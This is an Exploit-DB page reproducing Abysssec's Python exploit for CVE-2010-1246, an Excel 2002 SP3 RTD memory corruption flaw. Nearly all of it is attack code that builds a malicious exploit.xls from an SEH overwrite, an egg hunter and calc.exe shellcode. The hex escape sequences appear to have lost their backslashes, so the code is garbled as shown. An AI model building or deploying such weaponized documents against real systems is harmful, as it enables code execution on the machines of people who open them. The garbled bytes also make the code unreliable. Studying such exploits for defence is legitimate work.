[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MOAUB #10 - Excel RTD Memory Corruption
# Published : 2010-09-10
# Author : Abysssec
# Previous Title : MOAUB #12 - Adobe Acrobat and Reader "pushstring" Memory Corruption
# Next Title : Audiotran 1.4.2.4 SEH Overflow Exploit
'''
__ __ ____ _ _ ____
| / |/ __ / | | | | _
| / | | | | / | | | | |_) |
| |/| | | | |/ / | | | | _ <
| | | | |__| / ____ |__| | |_) |
|_| |_|____/_/ _____/|____/
http://www.exploit-db.com/moaub-10-excel-rtd-memory-corruption/
http://www.exploit-db.com/sploits/moaub-10-exploit.zip
'''
'''
Title : Excel RTD Memory Corruption
Version : Excel 2002 sp3
Analysis : http://www.abysssec.com
Vendor : http://www.microsoft.com
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-1246
MOAUB Number : MOAUB_10_BA
'''
import sys
def main():
try:
fdR = open('src.xls', 'rb+')
strTotal = fdR.read()
str1 = strTotal[:4509]
str2 = strTotal[5013:15000]
str3 = strTotal[15800:]
eip = "xAdx57x00x30" # pop pop ret
jmp = "xF7xC2x03x30" # call esp
#Egg Hunter
eggHunter = ""
eggHunter += "x90x90x90"
eggHunter += "x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex8AxD8x80xFBx05x5Ax74xECxB8x63"
eggHunter += "x70x74x6ex8BxFAxAFx75xE7xAFx75xE4xFFxE7"
# shellcode calc.exe
shellcode = 'x63x70x74x6ex63x70x74x6ex90x90x90x89xE5xD9xEExD9x75xF4x5Ex56x59x49x49x49x49x49x49x49x49x49x49x43x43x43x43x43x43x37x51x5Ax6Ax41x58x50x30x41x30x41x6Bx41x41x51x32x41x42x32x42x42x30x42x42x41x42x58x50x38x41x42x75x4Ax49x4Bx4Cx4Bx58x51x54x43x30x43x30x45x50x4Cx4Bx51x55x47x4Cx4Cx4Bx43x4Cx43x35x44x38x45x51x4Ax4Fx4Cx4Bx50x4Fx44x58x4Cx4Bx51x4Fx47x50x45x51x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43x31x4Ax4Ex46x51x49x50x4Ax39x4Ex4Cx4Cx44x49x50x42x54x45x57x49x51x48x4Ax44x4Dx45x51x49x52x4Ax4Bx4Bx44x47x4Bx46x34x46x44x45x54x43x45x4Ax45x4Cx4Bx51x4Fx47x54x43x31x4Ax4Bx43x56x4Cx4Bx44x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4Cx4Cx4Bx43x31x4Ax4Bx4Cx49x51x4Cx47x54x45x54x48x43x51x4Fx46x51x4Cx36x43x50x46x36x45x34x4Cx4Bx50x46x50x30x4Cx4Bx47x30x44x4Cx4Cx4Bx44x30x45x4Cx4Ex4Dx4Cx4Bx42x48x44x48x4Dx59x4Bx48x4Bx33x49x50x43x5Ax46x30x45x38x4Cx30x4Cx4Ax45x54x51x4Fx42x48x4Dx48x4Bx4Ex4Dx5Ax44x4Ex50x57x4Bx4Fx4Ax47x43x53x47x4Ax51x4Cx50x57x51x59x50x4Ex50x44x50x4Fx46x37x50x53x51x4Cx43x43x42x59x44x33x43x44x43x55x42x4Dx50x33x50x32x51x4Cx42x43x45x31x42x4Cx42x43x46x4Ex45x35x44x38x42x45x43x30x41x41'
if len(eggHunter) > 266:
print "[*] Error : Shellcode length is long"
return
if len(eggHunter) <=266:
dif =266 - len(eggHunter)
while dif > 0 :
eggHunter += 'x90'
dif = dif - 1
if len(shellcode) > 800:
print "[*] Error : Shellcode length is long"
return
if len(shellcode) <= 800:
dif = 800 - len(shellcode)
while dif > 0 :
shellcode += 'x90'
dif = dif - 1
fdW= open('exploit.xls', 'wb+')
fdW.write(str1)
fdW.write("x41x41x41") # padding
fdW.write(jmp)
fdW.write(eggHunter)
fdW.write("xebx06x41x41")
fdW.write(eip)
fdW.write("x81xc4x24x16x00x00") # add esp,2016
fdW.write("xc3") #ret
i = 0
while i < 54 :
fdW.write("x41x41x41x41") # padding
i = i + 1
fdW.write(str2)
fdW.write(shellcode)
fdW.write(str3)
fdW.close()
fdR.close()
print '[-] Excel file generated'
except IOError:
print '[*] Error : An IO error has occurred'
print '[-] Exiting ...'
sys.exit(-1)
if __name__ == '__main__':
main()